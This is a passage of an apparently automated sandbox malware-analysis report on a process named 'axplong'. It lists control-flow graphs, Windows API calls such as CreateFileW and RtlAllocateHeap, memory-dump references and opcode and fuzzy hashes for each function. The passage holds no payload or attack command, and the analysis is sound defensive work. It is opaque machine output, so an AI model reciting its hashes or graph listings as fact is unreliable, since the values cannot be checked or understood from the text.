                      • Instruction Fuzzy Hash: B5D1F670E006449BEB24BB28DC5A7AD7773AB42310F50429EE416AB3D2DB395F8187D6
                      Function 00706E01 Relevance: 4.6, APIs: 3, Instructions: 145COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1141 706e01-706e36 GetFileType 1142 706e3c-706e47 1141->1142 1143 706eee-706ef1 1141->1143 1144 706e69-706e85 call 704020 GetFileInformationByHandle 1142->1144 1145 706e49-706e5a call 707177 1142->1145 1146 706ef3-706ef6 1143->1146 1147 706f1a-706f42 1143->1147 1156 706f0b-706f18 call 70740d 1144->1156 1162 706e8b-706ecd call 7070c9 call 706f71 * 3 1144->1162 1159 706e60-706e67 1145->1159 1160 706f07-706f09 1145->1160 1146->1147 1152 706ef8-706efa 1146->1152 1148 706f44-706f57 1147->1148 1149 706f5f-706f61 1147->1149 1148->1149 1165 706f59-706f5c 1148->1165 1154 706f62-706f70 call 6ecf21 1149->1154 1152->1156 1157 706efc-706f01 call 707443 1152->1157 1156->1160 1157->1160 1159->1144 1160->1154 1177 706ed2-706eea call 707096 1162->1177 1165->1149 1177->1149 1180 706eec 1177->1180 1180->1160
                      APIs
                      • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00706E23
                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00706E7D
                      • __dosmaperr.LIBCMT ref: 00706F12
                        • Part of subcall function 00707177: __dosmaperr.LIBCMT ref: 007071AC
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: File__dosmaperr$HandleInformationType
                      • String ID:
                      • API String ID: 2531987475-0
                      • Opcode ID: c1a3cf9c184bfa1481b369ec336594e9ce15713fe78fde292019b551c330a326
                      • Instruction ID: c9aba27f40cae683a1e61801cb16f860650158264b9d96e56cff4dc00162127f
                      • Opcode Fuzzy Hash: c1a3cf9c184bfa1481b369ec336594e9ce15713fe78fde292019b551c330a326
                      • Instruction Fuzzy Hash: 3F416B75900245EFDB24EFB5EC559ABBBF9EF88300B10462DF556D3290EA38A914CB20
                      Function 0070D4F4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198COMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1376 70d4f4-70d515 call 6edeb0 1379 70d517 1376->1379 1380 70d52f-70d532 1376->1380 1381 70d519-70d51f 1379->1381 1382 70d54e-70d55a call 70a688 1379->1382 1380->1382 1383 70d534-70d537 1380->1383 1384 70d543-70d54c call 70d43c 1381->1384 1387 70d521-70d525 1381->1387 1394 70d564-70d570 call 70d47e 1382->1394 1395 70d55c-70d55f 1382->1395 1383->1384 1385 70d539-70d53c 1383->1385 1398 70d58c-70d595 1384->1398 1388 70d572-70d582 call 707443 call 706b8a 1385->1388 1389 70d53e-70d541 1385->1389 1387->1382 1392 70d527-70d52b 1387->1392 1388->1395 1389->1384 1389->1388 1392->1388 1397 70d52d 1392->1397 1394->1388 1410 70d584-70d589 1394->1410 1399 70d6cb-70d6da 1395->1399 1397->1384 1402 70d5a2-70d5b3 1398->1402 1403 70d597-70d59f call 708c8b 1398->1403 1408 70d5b5-70d5c7 1402->1408 1409 70d5c9 1402->1409 1403->1402 1412 70d5cb-70d5dc 1408->1412 1409->1412 1410->1398 1413 70d64a-70d65a call 70d687 1412->1413 1414 70d5de-70d5e0 1412->1414 1425 70d6c9 1413->1425 1426 70d65c-70d65e 1413->1426 1416 70d5e6-70d5e8 1414->1416 1417 70d6db-70d6dd 1414->1417 1421 70d5f4-70d600 1416->1421 1422 70d5ea-70d5ed 1416->1422 1418 70d6e7-70d6fa call 70651d 1417->1418 1419 70d6df-70d6e6 call 708cd3 1417->1419 1443 70d708-70d70e 1418->1443 1444 70d6fc-70d706 1418->1444 1419->1418 1428 70d640-70d648 1421->1428 1429 70d602-70d617 call 70d4eb * 2 1421->1429 1422->1421 1427 70d5ef-70d5f2 1422->1427 1425->1399 1433 70d660-70d676 call 70a531 1426->1433 1434 70d699-70d6a2 1426->1434 1427->1421 1435 70d61a-70d61c 1427->1435 1428->1413 1429->1435 1452 70d6a5-70d6a8 1433->1452 1434->1452 1435->1428 1437 70d61e-70d62e 1435->1437 1442 70d630-70d635 1437->1442 1442->1413 1447 70d637-70d63e 1442->1447 1449 70d710-70d711 1443->1449 1450 70d727-70d738 RtlAllocateHeap 1443->1450 1444->1443 1448 70d73c-70d747 call 707443 1444->1448 1447->1442 1460 70d749-70d74b 1448->1460 1449->1450 1454 70d713-70d71a call 709c81 1450->1454 1455 70d73a 1450->1455 1457 70d6b4-70d6bc 1452->1457 1458 70d6aa-70d6ad 1452->1458 1454->1448 1465 70d71c-70d725 call 708cf9 1454->1465 1455->1460 1457->1425 1464 70d6be-70d6c6 call 70a531 1457->1464 1458->1457 1463 70d6af-70d6b2 1458->1463 1463->1425 1463->1457 1464->1425 1465->1448 1465->1450
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: hpGp
                      • API String ID: 0-1679474782
                      • Opcode ID: 170a1d7b1c72058825bf3f0f3e21671062f045cbbaf2888da8b36588afa9a778
                      • Instruction ID: 82b1b40f0ce3e28a6d1b723f91a984e8a3ec9b6390e8b3ef708e2b1a8dba0448
                      • Opcode Fuzzy Hash: 170a1d7b1c72058825bf3f0f3e21671062f045cbbaf2888da8b36588afa9a778
                      • Instruction Fuzzy Hash: 9C61E072D00314CBDF35EFE8D8896EDB7F0AB55358F24831AE848AB2D1D6799C018B61
                      Function 006D82B0 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1470 6d82b0-6d8331 call 704020 1474 6d833d-6d8365 call 6e7870 call 6d5b20 1470->1474 1475 6d8333-6d8338 1470->1475 1483 6d8369-6d838b call 6e7870 call 6d5b20 1474->1483 1484 6d8367 1474->1484 1476 6d847f-6d849b call 6ecf21 1475->1476 1489 6d838d 1483->1489 1490 6d838f-6d83a8 1483->1490 1484->1483 1489->1490 1493 6d83d9-6d8404 1490->1493 1494 6d83aa-6d83b9 1490->1494 1497 6d8406-6d8415 1493->1497 1498 6d8431-6d8452 1493->1498 1495 6d83cf-6d83d6 call 6ed593 1494->1495 1496 6d83bb-6d83c9 1494->1496 1495->1493 1496->1495 1501 6d849c-6d84a1 call 706b9a 1496->1501 1503 6d8427-6d842e call 6ed593 1497->1503 1504 6d8417-6d8425 1497->1504 1499 6d8458-6d845d 1498->1499 1500 6d8454-6d8456 GetNativeSystemInfo 1498->1500 1505 6d845e-6d8465 1499->1505 1500->1505 1503->1498 1504->1501 1504->1503 1505->1476 1510 6d8467-6d846f 1505->1510 1513 6d8478-6d847b 1510->1513 1514 6d8471-6d8476 1510->1514 1513->1476 1515 6d847d 1513->1515 1514->1476 1515->1476
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?), ref: 006D8454
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0
                      • Opcode ID: df5faaba0ea7d58d473e8a5f23daf3a0cad401814fd2a93639e65f1fae5b10a8
                      • Instruction ID: ac241ae1b90d01954f0c6fd1929fead4509c0621bd105f0561a340aa7a4ae198
                      • Opcode Fuzzy Hash: df5faaba0ea7d58d473e8a5f23daf3a0cad401814fd2a93639e65f1fae5b10a8
                      • Instruction Fuzzy Hash: B9513970D002189FEB24EB68CD497EDB7B6EF45310F5042AAE809A73C1EF345E808B95
                      Function 00706C99 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1516 706c99-706ca5 1517 706cc4-706ce8 call 704020 1516->1517 1518 706ca7-706cc3 call 707430 call 707443 call 706b8a 1516->1518 1524 706d06-706d28 CreateFileW 1517->1524 1525 706cea-706d04 call 707430 call 707443 call 706b8a 1517->1525 1526 706d38-706d3f call 706d77 1524->1526 1527 706d2a-706d2e call 706e01 1524->1527 1547 706d72-706d76 1525->1547 1539 706d40-706d42 1526->1539 1535 706d33-706d36 1527->1535 1535->1539 1541 706d64-706d67 1539->1541 1542 706d44-706d61 call 704020 1539->1542 1543 706d70 1541->1543 1544 706d69-706d6f 1541->1544 1542->1541 1543->1547 1544->1543
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dbeb030267bcd835465aac94c6bb19745593586cea972788b061dfd283857965
                      • Instruction ID: 523b30ad188bef1afd6e3534a06321b9067902bf2420d4e9b49053f4d7e33878
                      • Opcode Fuzzy Hash: dbeb030267bcd835465aac94c6bb19745593586cea972788b061dfd283857965
                      • Instruction Fuzzy Hash: C821F572A01208FEEF11BB649C56B9F37A99F41778F200311F9243B1D1DBB8AE15D6A1
                      Function 00706F71 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1550 706f71-706f87 1551 706f97-706fa7 1550->1551 1552 706f89-706f8d 1550->1552 1556 706fe7-706fea 1551->1556 1557 706fa9-706fbb SystemTimeToTzSpecificLocalTime 1551->1557 1552->1551 1553 706f8f-706f95 1552->1553 1554 706fec-706ff7 call 6ecf21 1553->1554 1556->1554 1557->1556 1559 706fbd-706fdd call 706ff8 1557->1559 1562 706fe2-706fe5 1559->1562 1562->1554
                      APIs
                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00706FB3
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$LocalSpecificSystem
                      • String ID:
                      • API String ID: 2574697306-0
                      • Opcode ID: cd75351436d3db589aedadb467af63aa35543fbf372932aa0e642906dc46dd17
                      • Instruction ID: 1cede9797f16cab6d3e28a28f5e85487ee1f95b48814a84deace78bec9f5f087
                      • Opcode Fuzzy Hash: cd75351436d3db589aedadb467af63aa35543fbf372932aa0e642906dc46dd17
                      • Instruction Fuzzy Hash: D21106B690020DEADB00EA95D890EDFB7FCAF08314F604266F511E2180EB38FB55CB61
                      Function 0070D6EF Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1563 70d6ef-70d6fa 1564 70d708-70d70e 1563->1564 1565 70d6fc-70d706 1563->1565 1567 70d710-70d711 1564->1567 1568 70d727-70d738 RtlAllocateHeap 1564->1568 1565->1564 1566 70d73c-70d747 call 707443 1565->1566 1574 70d749-70d74b 1566->1574 1567->1568 1570 70d713-70d71a call 709c81 1568->1570 1571 70d73a 1568->1571 1570->1566 1576 70d71c-70d725 call 708cf9 1570->1576 1571->1574 1576->1566 1576->1568
                      APIs
                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0070A5ED,?,007074AE,?,00000000,?), ref: 0070D730
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: cca7d4b441b2743a02d5620d3898433d764b3807e75ab8af6ee3bb14362be2ce
                      • Instruction ID: 2ebc61f383505227a522a9d5f5859dd55de7a0d6245d26d7ac72ea562d41122c
                      • Opcode Fuzzy Hash: cca7d4b441b2743a02d5620d3898433d764b3807e75ab8af6ee3bb14362be2ce
                      • Instruction Fuzzy Hash: 2AF0E031545324E6EB322AA59C05B5B3BD59F41770B19A311BC04E61C1DA6CEC0046F1
                      Function 006E6AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 231009cf0b69f7f59c51001dc13be61522d614c3aae0f7853364956fa1b7222d
                      • Instruction ID: c479ba44a862227f6b67736b52494c9f04b98e377f905a5d1d10a64eb0560fa0
                      • Opcode Fuzzy Hash: 231009cf0b69f7f59c51001dc13be61522d614c3aae0f7853364956fa1b7222d
                      • Instruction Fuzzy Hash: A7F0F971E00644ABC7107B79DC0771E7B76A706760F80035DE811673E2DA38590547D6
                      Function 04FD0C34 Relevance: .2, Instructions: 163COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c797ae7f516d4e5361ab21d48a393eee6b0577f17b680c9882d5cf45099ec39e
                      • Instruction ID: 36d15f26df368fe0a52eb1e97cbfa389b7604aa4c2b7f144951810092d5dfbbf
                      • Opcode Fuzzy Hash: c797ae7f516d4e5361ab21d48a393eee6b0577f17b680c9882d5cf45099ec39e
                      • Instruction Fuzzy Hash: A23108E724D115BEA24291852B549FB7B2FE7C7338B388427F403C6542FEC42A5B6172
                      Function 04FD0C14 Relevance: .2, Instructions: 152COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bff24946df5730cc239fd15b9bab170e30c84e07eb4de8f3f4973afb9fd752b9
                      • Instruction ID: 3bcd5c836ec9dc46c10b2a894acd5a0e12a3e0b02b35d9f05e5f936d2ae63de7
                      • Opcode Fuzzy Hash: bff24946df5730cc239fd15b9bab170e30c84e07eb4de8f3f4973afb9fd752b9
                      • Instruction Fuzzy Hash: 3931F8E724D115BEA14291852B449FB6B2FE7C7738B38842BF807C5542FEC42A5B3172
                      Function 04FD0B87 Relevance: .2, Instructions: 151COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0865843b46b8844fad7c3fa306ae526a0b8b2ce1186c9ef2101d297e0488cc45
                      • Instruction ID: 44dc08a6b73ed80c0e511b8f84d04bc010f89ac749ff16956e82bfd8b1de2cd7
                      • Opcode Fuzzy Hash: 0865843b46b8844fad7c3fa306ae526a0b8b2ce1186c9ef2101d297e0488cc45
                      • Instruction Fuzzy Hash: DB31F6E724D115BDA14290852B449FB6B2FE7C7738B388427F807C6542FEC42A5B3172
                      Function 04FD0C08 Relevance: .1, Instructions: 131COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fd977d3472217a5dd4495cb005e8d11bfb77906d3192997808104fd9f1cce965
                      • Instruction ID: a7464e6881a5f7470bcacfe636ee233604f071b73260f38a56b25596df257387
                      • Opcode Fuzzy Hash: fd977d3472217a5dd4495cb005e8d11bfb77906d3192997808104fd9f1cce965
                      • Instruction Fuzzy Hash: 032195EB34D125BDA14290862B549FB6A2FE3D7734B388427F807D5642FEC42A5B3172
                      Function 04FD0BC0 Relevance: .1, Instructions: 127COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6a331d9067d3649494ebde5513cdbdabbd28f1ab1f5099a2aca0a6bfc479a186
                      • Instruction ID: 1a6c06ac1ac419d66ec906b5c678c05eeb04fd56ce7044729819a46a858e08ef
                      • Opcode Fuzzy Hash: 6a331d9067d3649494ebde5513cdbdabbd28f1ab1f5099a2aca0a6bfc479a186
                      • Instruction Fuzzy Hash: B92127E724D114BDA24391852B049FA6F2FE7CB334B388427F407C5542BEC82A9A3232
                      Function 04FD0C54 Relevance: .1, Instructions: 118COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 81283cd1b214090c275a4819fc70e2443278cb4d5cc5906d06921b762f396856
                      • Instruction ID: dea14bbe218c8344b0876a6885d9a2f50fb2aa4c113a3cd14a10de9490dbcd76
                      • Opcode Fuzzy Hash: 81283cd1b214090c275a4819fc70e2443278cb4d5cc5906d06921b762f396856
                      • Instruction Fuzzy Hash: 722108E738D110BEA14291852B149FA6B6FE7DB334B388027F507C5642FEC52A9B3132
                      Function 04FD0C7E Relevance: .1, Instructions: 113COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 56b8f22670b80df7fca91fe26c7ea3684943c456306991b1c6557d33d7cce754
                      • Instruction ID: 80d6ddbe12ad7c4f1a4f050819a1355b2e526a733f0e25e4e273bcc143b9fb6e
                      • Opcode Fuzzy Hash: 56b8f22670b80df7fca91fe26c7ea3684943c456306991b1c6557d33d7cce754
                      • Instruction Fuzzy Hash: ED2123B738D114BEA24295852B446FA6A2FF7D7334B348027F407C6542FED43A9A3232
                      Function 04FD0C6C Relevance: .1, Instructions: 106COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.3431220106.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_4fd0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5316f98024853420707a5ab3f5a73dbc7a23e8de97f2c3d14bc82234bd6daa04
                      • Instruction ID: 2a2c96eab243a2d8f25137025ad0202e312f1b3a3d523c1b68e43698db18bb4c
                      • Opcode Fuzzy Hash: 5316f98024853420707a5ab3f5a73dbc7a23e8de97f2c3d14bc82234bd6daa04
